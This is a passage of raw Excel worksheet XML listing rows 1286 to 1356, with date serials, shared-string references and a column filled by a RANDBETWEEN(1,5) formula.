      </c>
      <c r="C1286" t="s">
        <v>71</v>
      </c>
      <c r="E1286" s="2" t="s">
        <v>1385</v>
      </c>
      <c r="F1286">
        <f t="shared" ca="1" si="20"/>
        <v>4</v>
      </c>
    </row>
    <row r="1287" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A1287" s="1">
        <v>43535.332083333335</v>
      </c>
      <c r="B1287" t="s">
        <v>19</v>
      </c>
      <c r="C1287" t="s">
        <v>776</v>
      </c>
      <c r="E1287" s="2" t="s">
        <v>1386</v>
      </c>
      <c r="F1287">
        <f t="shared" ca="1" si="20"/>
        <v>3</v>
      </c>
    </row>
    <row r="1288" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1288" s="1">
        <v>43535.276319444441</v>
      </c>
      <c r="B1288" t="s">
        <v>19</v>
      </c>
      <c r="C1288" t="s">
        <v>41</v>
      </c>
      <c r="E1288" t="s">
        <v>1387</v>
      </c>
      <c r="F1288">
        <f t="shared" ca="1" si="20"/>
        <v>3</v>
      </c>
    </row>
    <row r="1289" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A1289" s="1">
        <v>43535.270694444444</v>
      </c>
      <c r="B1289" t="s">
        <v>5</v>
      </c>
      <c r="C1289" t="s">
        <v>124</v>
      </c>
      <c r="E1289" s="2" t="s">
        <v>1388</v>
      </c>
      <c r="F1289">
        <f t="shared" ca="1" si="20"/>
        <v>5</v>
      </c>
    </row>
    <row r="1290" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A1290" s="1">
        <v>43535.243055555555</v>
      </c>
      <c r="B1290" t="s">
        <v>19</v>
      </c>
      <c r="C1290" t="s">
        <v>48</v>
      </c>
      <c r="E1290" s="2" t="s">
        <v>1389</v>
      </c>
      <c r="F1290">
        <f t="shared" ca="1" si="20"/>
        <v>3</v>
      </c>
    </row>
    <row r="1291" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1291" s="1">
        <v>43535.238344907404</v>
      </c>
      <c r="B1291" t="s">
        <v>19</v>
      </c>
      <c r="C1291" t="s">
        <v>845</v>
      </c>
      <c r="E1291" t="s">
        <v>1390</v>
      </c>
      <c r="F1291">
        <f t="shared" ca="1" si="20"/>
        <v>2</v>
      </c>
    </row>
    <row r="1292" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A1292" s="1">
        <v>43535.23773148148</v>
      </c>
      <c r="B1292" t="s">
        <v>5</v>
      </c>
      <c r="C1292" t="s">
        <v>48</v>
      </c>
      <c r="E1292" s="2" t="s">
        <v>1391</v>
      </c>
      <c r="F1292">
        <f t="shared" ca="1" si="20"/>
        <v>3</v>
      </c>
    </row>
    <row r="1293" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1293" s="1">
        <v>43535.185972222222</v>
      </c>
      <c r="B1293" t="s">
        <v>19</v>
      </c>
      <c r="C1293" t="s">
        <v>65</v>
      </c>
      <c r="E1293" t="s">
        <v>1392</v>
      </c>
      <c r="F1293">
        <f t="shared" ca="1" si="20"/>
        <v>2</v>
      </c>
    </row>
    <row r="1294" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A1294" s="1">
        <v>43535.162418981483</v>
      </c>
      <c r="B1294" t="s">
        <v>9</v>
      </c>
      <c r="C1294" t="s">
        <v>71</v>
      </c>
      <c r="E1294" s="2" t="s">
        <v>1393</v>
      </c>
      <c r="F1294">
        <f t="shared" ca="1" si="20"/>
        <v>2</v>
      </c>
    </row>
    <row r="1295" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1295" s="1">
        <v>43535.159421296295</v>
      </c>
      <c r="B1295" t="s">
        <v>19</v>
      </c>
      <c r="C1295" t="s">
        <v>67</v>
      </c>
      <c r="E1295" t="s">
        <v>1394</v>
      </c>
      <c r="F1295">
        <f t="shared" ca="1" si="20"/>
        <v>3</v>
      </c>
    </row>
    <row r="1296" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A1296" s="1">
        <v>43535.112233796295</v>
      </c>
      <c r="B1296" t="s">
        <v>35</v>
      </c>
      <c r="C1296" t="s">
        <v>166</v>
      </c>
      <c r="E1296" s="2" t="s">
        <v>1395</v>
      </c>
      <c r="F1296">
        <f t="shared" ca="1" si="20"/>
        <v>2</v>
      </c>
    </row>
    <row r="1297" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1297" s="1">
        <v>43535.067557870374</v>
      </c>
      <c r="B1297" t="s">
        <v>13</v>
      </c>
      <c r="C1297" t="s">
        <v>229</v>
      </c>
      <c r="E1297" t="s">
        <v>1396</v>
      </c>
      <c r="F1297">
        <f t="shared" ca="1" si="20"/>
        <v>1</v>
      </c>
    </row>
    <row r="1298" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1298" s="1">
        <v>43535.05972222222</v>
      </c>
      <c r="B1298" t="s">
        <v>5</v>
      </c>
      <c r="C1298" t="s">
        <v>6</v>
      </c>
      <c r="D1298" t="s">
        <v>25</v>
      </c>
      <c r="E1298" t="s">
        <v>1397</v>
      </c>
      <c r="F1298">
        <f t="shared" ca="1" si="20"/>
        <v>3</v>
      </c>
    </row>
    <row r="1299" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1299" s="1">
        <v>43535.042164351849</v>
      </c>
      <c r="B1299" t="s">
        <v>9</v>
      </c>
      <c r="C1299" t="s">
        <v>260</v>
      </c>
      <c r="F1299">
        <f t="shared" ca="1" si="20"/>
        <v>3</v>
      </c>
    </row>
    <row r="1300" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1300" s="1">
        <v>43535.038414351853</v>
      </c>
      <c r="B1300" t="s">
        <v>1305</v>
      </c>
      <c r="C1300" t="s">
        <v>260</v>
      </c>
      <c r="E1300" t="s">
        <v>1398</v>
      </c>
      <c r="F1300">
        <f t="shared" ca="1" si="20"/>
        <v>1</v>
      </c>
    </row>
    <row r="1301" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1301" s="1">
        <v>43534.97074074074</v>
      </c>
      <c r="B1301" t="s">
        <v>13</v>
      </c>
      <c r="C1301" t="s">
        <v>48</v>
      </c>
      <c r="E1301" s="2" t="s">
        <v>1399</v>
      </c>
      <c r="F1301">
        <f t="shared" ca="1" si="20"/>
        <v>2</v>
      </c>
    </row>
    <row r="1302" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1302" s="1">
        <v>43534.939409722225</v>
      </c>
      <c r="B1302" t="s">
        <v>13</v>
      </c>
      <c r="C1302" t="s">
        <v>10</v>
      </c>
      <c r="D1302" t="s">
        <v>271</v>
      </c>
      <c r="E1302" t="s">
        <v>1400</v>
      </c>
      <c r="F1302">
        <f t="shared" ca="1" si="20"/>
        <v>5</v>
      </c>
    </row>
    <row r="1303" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1303" s="1">
        <v>43534.656331018516</v>
      </c>
      <c r="B1303" t="s">
        <v>13</v>
      </c>
      <c r="C1303" t="s">
        <v>48</v>
      </c>
      <c r="E1303" t="s">
        <v>1401</v>
      </c>
      <c r="F1303">
        <f t="shared" ca="1" si="20"/>
        <v>2</v>
      </c>
    </row>
    <row r="1304" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A1304" s="1">
        <v>43534.594641203701</v>
      </c>
      <c r="B1304" t="s">
        <v>1305</v>
      </c>
      <c r="C1304" t="s">
        <v>41</v>
      </c>
      <c r="E1304" s="2" t="s">
        <v>1402</v>
      </c>
      <c r="F1304">
        <f t="shared" ca="1" si="20"/>
        <v>4</v>
      </c>
    </row>
    <row r="1305" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1305" s="1">
        <v>43534.584930555553</v>
      </c>
      <c r="B1305" t="s">
        <v>9</v>
      </c>
      <c r="C1305" t="s">
        <v>10</v>
      </c>
      <c r="D1305" t="s">
        <v>158</v>
      </c>
      <c r="E1305" t="s">
        <v>1403</v>
      </c>
      <c r="F1305">
        <f t="shared" ca="1" si="20"/>
        <v>5</v>
      </c>
    </row>
    <row r="1306" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1306" s="1">
        <v>43534.584930555553</v>
      </c>
      <c r="B1306" t="s">
        <v>9</v>
      </c>
      <c r="C1306" t="s">
        <v>10</v>
      </c>
      <c r="D1306" t="s">
        <v>158</v>
      </c>
      <c r="E1306" t="s">
        <v>1403</v>
      </c>
      <c r="F1306">
        <f t="shared" ca="1" si="20"/>
        <v>3</v>
      </c>
    </row>
    <row r="1307" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1307" s="1">
        <v>43534.584930555553</v>
      </c>
      <c r="B1307" t="s">
        <v>9</v>
      </c>
      <c r="C1307" t="s">
        <v>10</v>
      </c>
      <c r="D1307" t="s">
        <v>158</v>
      </c>
      <c r="E1307" t="s">
        <v>1403</v>
      </c>
      <c r="F1307">
        <f t="shared" ca="1" si="20"/>
        <v>4</v>
      </c>
    </row>
    <row r="1308" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1308" s="1">
        <v>43534.485543981478</v>
      </c>
      <c r="B1308" t="s">
        <v>9</v>
      </c>
      <c r="C1308" t="s">
        <v>253</v>
      </c>
      <c r="E1308" t="s">
        <v>1405</v>
      </c>
      <c r="F1308">
        <f t="shared" ca="1" si="20"/>
        <v>5</v>
      </c>
    </row>
    <row r="1309" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1309" s="1">
        <v>43534.45758101852</v>
      </c>
      <c r="B1309" t="s">
        <v>5</v>
      </c>
      <c r="C1309" t="s">
        <v>60</v>
      </c>
      <c r="E1309" t="s">
        <v>1406</v>
      </c>
      <c r="F1309">
        <f t="shared" ca="1" si="20"/>
        <v>3</v>
      </c>
    </row>
    <row r="1310" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1310" s="1">
        <v>43534.353333333333</v>
      </c>
      <c r="B1310" t="s">
        <v>5</v>
      </c>
      <c r="C1310" t="s">
        <v>226</v>
      </c>
      <c r="E1310" t="s">
        <v>1407</v>
      </c>
      <c r="F1310">
        <f t="shared" ca="1" si="20"/>
        <v>2</v>
      </c>
    </row>
    <row r="1311" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A1311" s="1">
        <v>43533.79005787037</v>
      </c>
      <c r="B1311" t="s">
        <v>35</v>
      </c>
      <c r="C1311" t="s">
        <v>1408</v>
      </c>
      <c r="D1311" t="s">
        <v>107</v>
      </c>
      <c r="E1311" s="2" t="s">
        <v>1409</v>
      </c>
      <c r="F1311">
        <f t="shared" ca="1" si="20"/>
        <v>2</v>
      </c>
    </row>
    <row r="1312" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A1312" s="1">
        <v>43533.74459490741</v>
      </c>
      <c r="B1312" t="s">
        <v>5</v>
      </c>
      <c r="C1312" t="s">
        <v>10</v>
      </c>
      <c r="E1312" s="2" t="s">
        <v>1410</v>
      </c>
      <c r="F1312">
        <f t="shared" ca="1" si="20"/>
        <v>3</v>
      </c>
    </row>
    <row r="1313" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1313" s="1">
        <v>43533.4844212963</v>
      </c>
      <c r="B1313" t="s">
        <v>1305</v>
      </c>
      <c r="C1313" t="s">
        <v>29</v>
      </c>
      <c r="E1313" t="s">
        <v>1411</v>
      </c>
      <c r="F1313">
        <f t="shared" ca="1" si="20"/>
        <v>5</v>
      </c>
    </row>
    <row r="1314" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1314" s="1">
        <v>43533.38753472222</v>
      </c>
      <c r="B1314" t="s">
        <v>19</v>
      </c>
      <c r="C1314" t="s">
        <v>48</v>
      </c>
      <c r="E1314" t="s">
        <v>1412</v>
      </c>
      <c r="F1314">
        <f t="shared" ca="1" si="20"/>
        <v>5</v>
      </c>
    </row>
    <row r="1315" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A1315" s="1">
        <v>43533.37537037037</v>
      </c>
      <c r="B1315" t="s">
        <v>9</v>
      </c>
      <c r="C1315" t="s">
        <v>48</v>
      </c>
      <c r="D1315" t="s">
        <v>124</v>
      </c>
      <c r="E1315" s="2" t="s">
        <v>1413</v>
      </c>
      <c r="F1315">
        <f t="shared" ca="1" si="20"/>
        <v>5</v>
      </c>
    </row>
    <row r="1316" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1316" s="1">
        <v>43533.212627314817</v>
      </c>
      <c r="B1316" t="s">
        <v>5</v>
      </c>
      <c r="C1316" t="s">
        <v>430</v>
      </c>
      <c r="F1316">
        <f t="shared" ca="1" si="20"/>
        <v>2</v>
      </c>
    </row>
    <row r="1317" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1317" s="1">
        <v>43533.184293981481</v>
      </c>
      <c r="B1317" t="s">
        <v>13</v>
      </c>
      <c r="C1317" t="s">
        <v>229</v>
      </c>
      <c r="E1317" t="s">
        <v>1168</v>
      </c>
      <c r="F1317">
        <f t="shared" ca="1" si="20"/>
        <v>5</v>
      </c>
    </row>
    <row r="1318" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A1318" s="1">
        <v>43532.900821759256</v>
      </c>
      <c r="B1318" t="s">
        <v>19</v>
      </c>
      <c r="C1318" t="s">
        <v>1414</v>
      </c>
      <c r="D1318" t="s">
        <v>194</v>
      </c>
      <c r="E1318" s="2" t="s">
        <v>1415</v>
      </c>
      <c r="F1318">
        <f t="shared" ca="1" si="20"/>
        <v>1</v>
      </c>
    </row>
    <row r="1319" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1319" s="1">
        <v>43532.894780092596</v>
      </c>
      <c r="B1319" t="s">
        <v>5</v>
      </c>
      <c r="C1319" t="s">
        <v>41</v>
      </c>
      <c r="E1319" t="s">
        <v>1416</v>
      </c>
      <c r="F1319">
        <f t="shared" ca="1" si="20"/>
        <v>2</v>
      </c>
    </row>
    <row r="1320" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1320" s="1">
        <v>43532.799907407411</v>
      </c>
      <c r="B1320" t="s">
        <v>19</v>
      </c>
      <c r="C1320" t="s">
        <v>6</v>
      </c>
      <c r="D1320" t="s">
        <v>114</v>
      </c>
      <c r="E1320" s="2" t="s">
        <v>1417</v>
      </c>
      <c r="F1320">
        <f t="shared" ca="1" si="20"/>
        <v>3</v>
      </c>
    </row>
    <row r="1321" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1321" s="1">
        <v>43532.744687500002</v>
      </c>
      <c r="B1321" t="s">
        <v>9</v>
      </c>
      <c r="C1321" t="s">
        <v>10</v>
      </c>
      <c r="D1321" t="s">
        <v>107</v>
      </c>
      <c r="E1321" t="s">
        <v>1418</v>
      </c>
      <c r="F1321">
        <f t="shared" ca="1" si="20"/>
        <v>3</v>
      </c>
    </row>
    <row r="1322" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1322" s="1">
        <v>43532.741342592592</v>
      </c>
      <c r="B1322" t="s">
        <v>5</v>
      </c>
      <c r="C1322" t="s">
        <v>10</v>
      </c>
      <c r="D1322" t="s">
        <v>17</v>
      </c>
      <c r="E1322" s="2" t="s">
        <v>1419</v>
      </c>
      <c r="F1322">
        <f t="shared" ca="1" si="20"/>
        <v>2</v>
      </c>
    </row>
    <row r="1323" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A1323" s="1">
        <v>43532.73300925926</v>
      </c>
      <c r="B1323" t="s">
        <v>19</v>
      </c>
      <c r="C1323" t="s">
        <v>559</v>
      </c>
      <c r="E1323" s="2" t="s">
        <v>1420</v>
      </c>
      <c r="F1323">
        <f t="shared" ca="1" si="20"/>
        <v>4</v>
      </c>
    </row>
    <row r="1324" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A1324" s="1">
        <v>43532.732997685183</v>
      </c>
      <c r="B1324" t="s">
        <v>19</v>
      </c>
      <c r="C1324" t="s">
        <v>559</v>
      </c>
      <c r="E1324" s="2" t="s">
        <v>1420</v>
      </c>
      <c r="F1324">
        <f t="shared" ca="1" si="20"/>
        <v>3</v>
      </c>
    </row>
    <row r="1325" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1325" s="1">
        <v>43532.651805555557</v>
      </c>
      <c r="B1325" t="s">
        <v>13</v>
      </c>
      <c r="C1325" t="s">
        <v>107</v>
      </c>
      <c r="E1325" s="2" t="s">
        <v>1421</v>
      </c>
      <c r="F1325">
        <f t="shared" ca="1" si="20"/>
        <v>3</v>
      </c>
    </row>
    <row r="1326" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1326" s="1">
        <v>43532.650381944448</v>
      </c>
      <c r="B1326" t="s">
        <v>13</v>
      </c>
      <c r="C1326" t="s">
        <v>6</v>
      </c>
      <c r="D1326" t="s">
        <v>67</v>
      </c>
      <c r="E1326" t="s">
        <v>1422</v>
      </c>
      <c r="F1326">
        <f t="shared" ca="1" si="20"/>
        <v>1</v>
      </c>
    </row>
    <row r="1327" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1327" s="1">
        <v>43532.641747685186</v>
      </c>
      <c r="B1327" t="s">
        <v>19</v>
      </c>
      <c r="C1327" t="s">
        <v>10</v>
      </c>
      <c r="D1327" t="s">
        <v>6</v>
      </c>
      <c r="E1327" s="2" t="s">
        <v>1423</v>
      </c>
      <c r="F1327">
        <f t="shared" ca="1" si="20"/>
        <v>2</v>
      </c>
    </row>
    <row r="1328" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A1328" s="1">
        <v>43532.634710648148</v>
      </c>
      <c r="B1328" t="s">
        <v>19</v>
      </c>
      <c r="C1328" t="s">
        <v>10</v>
      </c>
      <c r="D1328" t="s">
        <v>89</v>
      </c>
      <c r="E1328" s="2" t="s">
        <v>1424</v>
      </c>
      <c r="F1328">
        <f t="shared" ca="1" si="20"/>
        <v>5</v>
      </c>
    </row>
    <row r="1329" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1329" s="1">
        <v>43532.606041666666</v>
      </c>
      <c r="B1329" t="s">
        <v>1305</v>
      </c>
      <c r="C1329" t="s">
        <v>253</v>
      </c>
      <c r="F1329">
        <f t="shared" ca="1" si="20"/>
        <v>3</v>
      </c>
    </row>
    <row r="1330" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1330" s="1">
        <v>43532.598773148151</v>
      </c>
      <c r="B1330" t="s">
        <v>19</v>
      </c>
      <c r="C1330" t="s">
        <v>10</v>
      </c>
      <c r="D1330" t="s">
        <v>336</v>
      </c>
      <c r="E1330" t="s">
        <v>1425</v>
      </c>
      <c r="F1330">
        <f t="shared" ca="1" si="20"/>
        <v>1</v>
      </c>
    </row>
    <row r="1331" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1331" s="1">
        <v>43532.595625000002</v>
      </c>
      <c r="B1331" t="s">
        <v>19</v>
      </c>
      <c r="C1331" t="s">
        <v>10</v>
      </c>
      <c r="D1331" t="s">
        <v>52</v>
      </c>
      <c r="E1331" t="s">
        <v>1426</v>
      </c>
      <c r="F1331">
        <f t="shared" ca="1" si="20"/>
        <v>4</v>
      </c>
    </row>
    <row r="1332" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A1332" s="1">
        <v>43532.591874999998</v>
      </c>
      <c r="B1332" t="s">
        <v>5</v>
      </c>
      <c r="C1332" t="s">
        <v>10</v>
      </c>
      <c r="D1332" t="s">
        <v>336</v>
      </c>
      <c r="E1332" s="2" t="s">
        <v>1427</v>
      </c>
      <c r="F1332">
        <f t="shared" ca="1" si="20"/>
        <v>3</v>
      </c>
    </row>
    <row r="1333" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1333" s="1">
        <v>43532.58353009259</v>
      </c>
      <c r="B1333" t="s">
        <v>19</v>
      </c>
      <c r="C1333" t="s">
        <v>10</v>
      </c>
      <c r="D1333" t="s">
        <v>36</v>
      </c>
      <c r="E1333" t="s">
        <v>1428</v>
      </c>
      <c r="F1333">
        <f t="shared" ca="1" si="20"/>
        <v>3</v>
      </c>
    </row>
    <row r="1334" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1334" s="1">
        <v>43532.577847222223</v>
      </c>
      <c r="B1334" t="s">
        <v>35</v>
      </c>
      <c r="C1334" t="s">
        <v>10</v>
      </c>
      <c r="D1334" t="s">
        <v>46</v>
      </c>
      <c r="E1334" t="s">
        <v>1429</v>
      </c>
      <c r="F1334">
        <f t="shared" ca="1" si="20"/>
        <v>5</v>
      </c>
    </row>
    <row r="1335" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A1335" s="1">
        <v>43532.562199074076</v>
      </c>
      <c r="B1335" t="s">
        <v>19</v>
      </c>
      <c r="C1335" t="s">
        <v>222</v>
      </c>
      <c r="E1335" s="2" t="s">
        <v>1430</v>
      </c>
      <c r="F1335">
        <f t="shared" ca="1" si="20"/>
        <v>5</v>
      </c>
    </row>
    <row r="1336" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1336" s="1">
        <v>43532.556469907409</v>
      </c>
      <c r="B1336" t="s">
        <v>13</v>
      </c>
      <c r="C1336" t="s">
        <v>10</v>
      </c>
      <c r="D1336" t="s">
        <v>20</v>
      </c>
      <c r="E1336" s="2" t="s">
        <v>1431</v>
      </c>
      <c r="F1336">
        <f t="shared" ca="1" si="20"/>
        <v>1</v>
      </c>
    </row>
    <row r="1337" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1337" s="1">
        <v>43532.553784722222</v>
      </c>
      <c r="B1337" t="s">
        <v>19</v>
      </c>
      <c r="C1337" t="s">
        <v>10</v>
      </c>
      <c r="D1337" t="s">
        <v>163</v>
      </c>
      <c r="E1337" t="s">
        <v>1432</v>
      </c>
      <c r="F1337">
        <f t="shared" ca="1" si="20"/>
        <v>2</v>
      </c>
    </row>
    <row r="1338" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1338" s="1">
        <v>43532.525856481479</v>
      </c>
      <c r="B1338" t="s">
        <v>13</v>
      </c>
      <c r="C1338" t="s">
        <v>10</v>
      </c>
      <c r="D1338" t="s">
        <v>36</v>
      </c>
      <c r="F1338">
        <f t="shared" ca="1" si="20"/>
        <v>4</v>
      </c>
    </row>
    <row r="1339" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A1339" s="1">
        <v>43532.511504629627</v>
      </c>
      <c r="B1339" t="s">
        <v>13</v>
      </c>
      <c r="C1339" t="s">
        <v>6</v>
      </c>
      <c r="D1339" t="s">
        <v>25</v>
      </c>
      <c r="E1339" s="2" t="s">
        <v>1433</v>
      </c>
      <c r="F1339">
        <f t="shared" ca="1" si="20"/>
        <v>5</v>
      </c>
    </row>
    <row r="1340" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1340" s="1">
        <v>43532.489062499997</v>
      </c>
      <c r="B1340" t="s">
        <v>13</v>
      </c>
      <c r="C1340" t="s">
        <v>10</v>
      </c>
      <c r="D1340" t="s">
        <v>56</v>
      </c>
      <c r="E1340" t="s">
        <v>1434</v>
      </c>
      <c r="F1340">
        <f t="shared" ca="1" si="20"/>
        <v>2</v>
      </c>
    </row>
    <row r="1341" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1341" s="1">
        <v>43532.473136574074</v>
      </c>
      <c r="B1341" t="s">
        <v>35</v>
      </c>
      <c r="C1341" t="s">
        <v>80</v>
      </c>
      <c r="F1341">
        <f t="shared" ca="1" si="20"/>
        <v>2</v>
      </c>
    </row>
    <row r="1342" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1342" s="1">
        <v>43532.468124999999</v>
      </c>
      <c r="B1342" t="s">
        <v>13</v>
      </c>
      <c r="C1342" t="s">
        <v>260</v>
      </c>
      <c r="E1342" s="2" t="s">
        <v>1435</v>
      </c>
      <c r="F1342">
        <f t="shared" ca="1" si="20"/>
        <v>4</v>
      </c>
    </row>
    <row r="1343" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1343" s="1">
        <v>43532.462476851855</v>
      </c>
      <c r="B1343" t="s">
        <v>5</v>
      </c>
      <c r="C1343" t="s">
        <v>41</v>
      </c>
      <c r="E1343" s="2" t="s">
        <v>1437</v>
      </c>
      <c r="F1343">
        <f t="shared" ca="1" si="20"/>
        <v>3</v>
      </c>
    </row>
    <row r="1344" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A1344" s="1">
        <v>43532.437476851854</v>
      </c>
      <c r="B1344" t="s">
        <v>19</v>
      </c>
      <c r="C1344" t="s">
        <v>63</v>
      </c>
      <c r="E1344" s="2" t="s">
        <v>1438</v>
      </c>
      <c r="F1344">
        <f t="shared" ca="1" si="20"/>
        <v>4</v>
      </c>
    </row>
    <row r="1345" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1345" s="1">
        <v>43532.430300925924</v>
      </c>
      <c r="B1345" t="s">
        <v>13</v>
      </c>
      <c r="C1345" t="s">
        <v>10</v>
      </c>
      <c r="D1345" t="s">
        <v>36</v>
      </c>
      <c r="E1345" t="s">
        <v>1439</v>
      </c>
      <c r="F1345">
        <f t="shared" ca="1" si="20"/>
        <v>4</v>
      </c>
    </row>
    <row r="1346" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A1346" s="1">
        <v>43532.427557870367</v>
      </c>
      <c r="B1346" t="s">
        <v>19</v>
      </c>
      <c r="C1346" t="s">
        <v>71</v>
      </c>
      <c r="E1346" s="2" t="s">
        <v>1441</v>
      </c>
      <c r="F1346">
        <f t="shared" ref="F1346:F1409" ca="1" si="21">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="1347" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1347" s="1">
        <v>43532.411747685182</v>
      </c>
      <c r="B1347" t="s">
        <v>5</v>
      </c>
      <c r="C1347" t="s">
        <v>10</v>
      </c>
      <c r="D1347" t="s">
        <v>17</v>
      </c>
      <c r="E1347" t="s">
        <v>1442</v>
      </c>
      <c r="F1347">
        <f t="shared" ca="1" si="21"/>
        <v>3</v>
      </c>
    </row>
    <row r="1348" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1348" s="1">
        <v>43532.410208333335</v>
      </c>
      <c r="B1348" t="s">
        <v>35</v>
      </c>
      <c r="C1348" t="s">
        <v>10</v>
      </c>
      <c r="D1348" t="s">
        <v>151</v>
      </c>
      <c r="E1348" t="s">
        <v>1443</v>
      </c>
      <c r="F1348">
        <f t="shared" ca="1" si="21"/>
        <v>4</v>
      </c>
    </row>
    <row r="1349" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1349" s="1">
        <v>43532.3825462963</v>
      </c>
      <c r="B1349" t="s">
        <v>13</v>
      </c>
      <c r="C1349" t="s">
        <v>10</v>
      </c>
      <c r="D1349" t="s">
        <v>20</v>
      </c>
      <c r="E1349" t="s">
        <v>1444</v>
      </c>
      <c r="F1349">
        <f t="shared" ca="1" si="21"/>
        <v>5</v>
      </c>
    </row>
    <row r="1350" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1350" s="1">
        <v>43532.381736111114</v>
      </c>
      <c r="B1350" t="s">
        <v>5</v>
      </c>
      <c r="C1350" t="s">
        <v>10</v>
      </c>
      <c r="D1350" t="s">
        <v>14</v>
      </c>
      <c r="E1350" t="s">
        <v>1445</v>
      </c>
      <c r="F1350">
        <f t="shared" ca="1" si="21"/>
        <v>4</v>
      </c>
    </row>
    <row r="1351" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1351" s="1">
        <v>43532.381180555552</v>
      </c>
      <c r="B1351" t="s">
        <v>13</v>
      </c>
      <c r="C1351" t="s">
        <v>41</v>
      </c>
      <c r="E1351" t="s">
        <v>1446</v>
      </c>
      <c r="F1351">
        <f t="shared" ca="1" si="21"/>
        <v>1</v>
      </c>
    </row>
    <row r="1352" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A1352" s="1">
        <v>43532.377002314817</v>
      </c>
      <c r="B1352" t="s">
        <v>19</v>
      </c>
      <c r="C1352" t="s">
        <v>71</v>
      </c>
      <c r="E1352" s="2" t="s">
        <v>1447</v>
      </c>
      <c r="F1352">
        <f t="shared" ca="1" si="21"/>
        <v>4</v>
      </c>
    </row>
    <row r="1353" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1353" s="1">
        <v>43532.370891203704</v>
      </c>
      <c r="B1353" t="s">
        <v>19</v>
      </c>
      <c r="C1353" t="s">
        <v>10</v>
      </c>
      <c r="D1353" t="s">
        <v>192</v>
      </c>
      <c r="E1353" t="s">
        <v>1448</v>
      </c>
      <c r="F1353">
        <f t="shared" ca="1" si="21"/>
        <v>1</v>
      </c>
    </row>
    <row r="1354" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1354" s="1">
        <v>43532.35255787037</v>
      </c>
      <c r="B1354" t="s">
        <v>19</v>
      </c>
      <c r="C1354" t="s">
        <v>50</v>
      </c>
      <c r="E1354" s="2" t="s">
        <v>1449</v>
      </c>
      <c r="F1354">
        <f t="shared" ca="1" si="21"/>
        <v>1</v>
      </c>
    </row>
    <row r="1355" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A1355" s="1">
        <v>43532.342326388891</v>
      </c>
      <c r="B1355" t="s">
        <v>5</v>
      </c>
      <c r="C1355" t="s">
        <v>71</v>
      </c>
      <c r="E1355" s="2" t="s">
        <v>1450</v>
      </c>
      <c r="F1355">
        <f t="shared" ca="1" si="21"/>
        <v>1</v>
      </c>
    </row>
    <row r="1356" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A1356" s="1">
        <v>43532.340717592589</v>
      </c>
      <c r="B1356" t="s">
        <v>19</v>
      </c>
      <c r="C1356" t="s">
        <v>10</v>
      </c>
      <c r="D1356" t="s">
        <v>244</v>
      </c>
